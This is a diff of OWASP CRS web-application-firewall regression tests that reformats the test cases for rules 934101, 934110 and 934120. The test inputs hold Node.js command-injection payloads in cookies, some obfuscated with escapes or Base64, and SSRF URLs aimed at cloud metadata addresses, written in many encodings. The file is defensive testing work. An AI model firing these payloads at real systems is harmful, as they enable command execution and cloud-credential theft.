"Detect example payload require(... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=require("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=require("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 7 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=require("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 8 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 9 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 10 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index 25fc7eee7..7dc54e0c6 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml @@ -1,151 +1,142 @@ --- meta: author: "fzipitria, azurit" - enabled: true - name: "934110.yaml" description: "Test for vanilla SSRF in PL1" +rule_id: 934110 tests: - - test_title: 934110-1 + - test_id: 1 desc: SSRF - check google cloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F" + version: "HTTP/1.1" + output: + log_contains: id "934110" + - test_id: 2 desc: SSRF - check digitalcloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json" + version: "HTTP/1.1" + output: + log_contains: id "934110" + - test_id: 3 desc: SSRF - check packetcloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata" + version: "HTTP/1.1" + output: + log_contains: id "934110" + - test_id: 4 desc: SSRF - check openstack url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack" + version: "HTTP/1.1" + output: + log_contains: id "934110" + - test_id: 5 desc: SSRF - check oracle cloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F" + version: "HTTP/1.1" + output: + log_contains: id "934110" + - test_id: 6 desc: SSRF - negative test aws stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data" - version: "HTTP/1.1" - output: - no_log_contains: id "934110" - - test_title: 934110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data" + version: "HTTP/1.1" + output: + no_log_contains: id "934110" + - test_id: 7 desc: SSRF - negative test aws stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest" - version: "HTTP/1.1" - output: - no_log_contains: id "934110" - - test_title: 934110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest" + version: "HTTP/1.1" + output: + no_log_contains: id "934110" + - test_id: 8 desc: SSRF - negative test gcp stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal" - version: "HTTP/1.1" - output: - no_log_contains: id "934110" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal" + version: "HTTP/1.1" + output: + no_log_contains: id "934110" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml index d39766afd..76f57f20d 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml @@ -1,891 +1,841 @@ --- meta: author: "fzipitria, Max Leske, azurit" - enabled: true - name: "934120.yaml" description: "Description" +rule_id: 934120 tests: - - test_title: 934120-1 + - test_id: 1 desc: SSRF - IPv4, Dotless decimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 2 desc: SSRF - IPv4, Dotless decimal with overflow stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://7147006462/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://7147006462/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 3 desc: SSRF - IPv4, Dotted hexadecimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 4 desc: SSRF - IPv4, Dotless hexadecimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0xA9FEA9FE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0xA9FEA9FE/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 5 desc: SSRF - IPv4, Dotless hexadecimal with overflow stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0x41414141A9FEA9FE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0x41414141A9FEA9FE/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 6 desc: SSRF - IPv4, Dotted octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0251.0376.0251.0376/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0251.0376.0251.0376/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 7 desc: SSRF - IPv4, Dotted octal with padding stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0251.00376.000251.0000376/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0251.00376.000251.0000376/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 8 desc: SSRF - IPv4, dotted, two bytes decimal, two bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169.254.43518/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169.254.43518/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 9 desc: SSRF - IPv4, dotted, one byte decimal, three bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169.16689662/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169.16689662/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 10 desc: SSRF - IPv6, first 10 bytes compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 11 desc: SSRF - IPV6 Expanded stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 12 desc: SSRF - IPV6 Expanded - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 13 desc: SSRF - Dotless decimal - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=2852039166" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=2852039166" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 14 desc: SSRF - Dotless hexadecimal with overflow - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=0x41414141A9FEA9FE" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=0x41414141A9FEA9FE" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 15 desc: SSRF - Negative tests - IPv4, dotted, one byte decimal, three bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=169.16689662" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=169.16689662" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 16 desc: SSRF - Negative tests - IPV6 Compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[::ffff:a9fe:a9fe" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[::ffff:a9fe:a9fe" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 17 desc: SSRF - Negative tests - IPV6 Compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[::ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" 